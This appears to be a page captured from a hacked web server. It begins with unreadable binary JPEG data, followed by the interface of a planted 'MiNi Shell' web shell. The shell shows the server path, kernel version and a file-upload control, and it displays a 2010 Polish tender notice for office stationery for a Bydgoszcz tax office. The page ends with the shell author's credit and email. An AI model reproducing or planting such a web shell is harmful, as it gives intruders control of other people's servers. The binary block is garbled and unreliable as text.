JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100118/14006-N-2010.html

<p class="kh_header"><b>Bydgoszcz: Dostawa artykułów papierniczych dla Pierwszego Urzędu Skarbowego w Bydgoszczy</b><br>
<b>Numer ogłoszenia: 14006 - 2010; data zamieszczenia: 18.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pierwszy Urząd Skarbowy w Bydgoszczy , ul. Fordońska 77, 85-950 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3452771, faks 052 5848294.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów papierniczych dla Pierwszego Urzędu Skarbowego w Bydgoszczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów papierniczych o następujących wymaganych parametrach, wyszczególnionych poniżej:

Lp., Nazwa artykułu
Jednostka miary - Ilość
 
1. papier kserograficzny A-4, gramatura - 80 ? 2 g/m2, wilgotność - 3,8 - 5,0%, 
grubość - 108 ? 3 ?m, białość - 161 ? 2 CIE,  gładkość - 180 ? 50 cm3 /min (szorstkość wg Bendtsen), jasność - 65 (z UV) - 110 ? 2%
ryza (500 kartek) - 3.500
2. koperty małe z okienkiem prawym,C-6, o wym. 114mm x 162mm, białe , samoklejące
karton (1.000 szt.) - 20
3. koperty małe, C-6, bez okienka, o wym. 114mm x 162mm, białe, samoklejące
karton (1.000 szt.) - 10
4. koperty średnie, C-5, o wym. 162mm x 229mm, białe, samoklejące, bez okienka
karton (500 szt.) - 20
5. koperty duże, C-4, o wym. 229mm x 324mm, białe, samoklejące, bez okienka
karton (250 szt.) - 10
6. koperty średnie, DL, o wym. 110mm x 220mm, białe, samoklejące, z okienkiem prawym
karton (1.000 szt.) - 50
7. skoroszyt, biały, A-4, wykonany z kartonu o grubości 250 g/m2 (zwykły)
szt. - 30.000
8. skoroszyt, biały, ?, z zawieszką, A-4, wykonany z kartonu o grubości 250 g/m2
szt. - 1.000
9. skoroszyt, A-4, oczkowy, wykonany z kartonu o grubości 250 g/m2
szt. - 500
10. kalka ołówkowa, A-4, koloru niebieskiego, powlekana woskiem, o dużej intensywności zabarwienia (nie gorsza niż typu Pelikan 500H)
opakowanie (100 szt.) - 5
11. segregator A-4,  z mechanizmem dźwigniowym, o szerokości  7,5cm, wyposażony w metalową listwę chroniącą krawędzie, dwustronna wymienna etykieta, różne kolory
szt. - 1.000
12. papier komputerowy, składanka, o wym. 390mm x 12m x 1, biały, 70g
karton (2.000 szt.) - 35
13. papier komputerowy, składanka, o wym. 240mm x 12m x 1, biały, 70g
karton (2.000 szt.) - 10
14. bloczek karteczek samoprzylepnych, żółtych, o wym. 76mm x 76mm, bloczek 100 kartek
szt. - 200
15. kostka klejona, biała, ok. 400 kartek, o wym. 8,5cm x 8,5 cm x 4 cm
szt. - 300
16. naklejka na segregator, samoprzylepna, o szerokości 5,5 cm
szt. - 1.000
17. naklejka na segregator, samoprzylepna, o szerokości 7,5 cm
szt. - 4.000
18. teczka papierowa, wiązana, A-4, wykonana z kartonu o grubości 250 g/m2
szt. - 13.000
19. blok notatnikowy, w kratkę, A-4, 100-kartkowy
szt. - 260
20. blok notatnikowy w kratkę, A-5, 100-kartkowy
szt. - 260
21. brulion, A-4/96 kartek, kratka,  sztywna oprawa
szt. - 25
22. zeszyt, A-4/96 kartek, kratka
szt. - 35

2. Dopuszcza się dostawę zamawianych artykułów w opakowaniach zawierających inną liczbę sztuk niż podana w opisie przedmiotu zamówienia.
3. Wykorzystanie w opisie przedmiotu zamówienia nazw własnych oraz znaków towarowych ma na celu wyłącznie  zapewnienie zachowania standardów jakości artykułu. W przypadku zaproponowania produktu równoważnego wymaga się, aby odpowiadał on pod względem jakości, trwałości, funkcjonalności oraz estetyki wykonania produktom wskazanym przez Zamawiającego.
4. Wszystkie artykuły papiernicze będące przedmiotem zamówienia winny być wyrobami fabrycznie nowymi, nieużywanymi, wolnymi od wad..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.76.30-1, 30.19.93.30-2, 30.19.92.30-1, 22.85.10.00-0, 30.19.91.10-4, 30.19.28.00-9, 22.81.60.00-3, 22.81.63.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, spełniający następujące warunki udziału w postępowaniu:
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
oraz udokumentują to poprzez złożenie oświadczenia stanowiącego załącznik nr 2 do niniejszej Specyfikacji,
- posiadają wiedzę i doświadczenie, 
oraz udokumentują to poprzez złożenie oświadczenia  stanowiącego załącznik nr 2 do niniejszej Specyfikacji,
- dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
oraz udokumentują to poprzez złożenie oświadczenia  stanowiącego załącznik nr 2 do niniejszej Specyfikacji, 
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
oraz udokumentują to poprzez oraz oświadczenia stanowiącego załącznik nr 2 do niniejszej Specyfikacji,
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych,
oraz udokumentują to poprzez złożenie dokumentów wskazanych w § 7 niniejszej Specyfikacji oraz złożenie oświadczenia  stanowiącego załącznik nr 3 do niniejszej Specyfikacji, 
- złożą formularz ofertowy wraz z wymaganymi dokumentami, oświadczeniami, załącznikami oraz zaświadczeniami wymaganymi treścią niniejszej Specyfikacji,
- spełniają określone ustawą Prawo zamówień publicznych oraz niniejszą Specyfikacją wymagania.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty określone w § 7 niniejszej Specyfikacji: Wykaz oświadczeń lub dokumentów wymaganych od Wykonawcy, metodą warunku granicznego - spełnia- nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta powinna zawierać następujące oświadczenia i dokumenty jako załączniki stanowiące integralną jej część:
1. Oświadczenie Wykonawcy potwierdzające spełnienie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, wg ustawy Prawo zamówień publicznych, z wykorzystaniem wzoru (załącznik nr 2).
2. Oświadczenie Wykonawcy potwierdzające brak podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego, wg ustawy Prawo zamówień publicznych, z wykorzystaniem wzoru (załącznik nr 3).
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp.
4.  Aktualne zaświadczenia właściwego Naczelnika Urzędu Skarbowego  potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5. Aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6. Wypełniony formularz ofertowy, z wykorzystaniem wzoru (załącznik nr 4)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.izba-skarbowa.bydgoszcz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pierwszy Urząd Skarbowy w Bydgoszczy
ul. Fordońska 77
85-950 Bydgoszcz
pokój nr 904B, IX piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2010 godzina 09:00, miejsce: Pierwszy Urząd Skarbowy w Bydgoszczy
ul. Fordońska 77
85-950 Bydgoszcz
kancelaria - parter.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com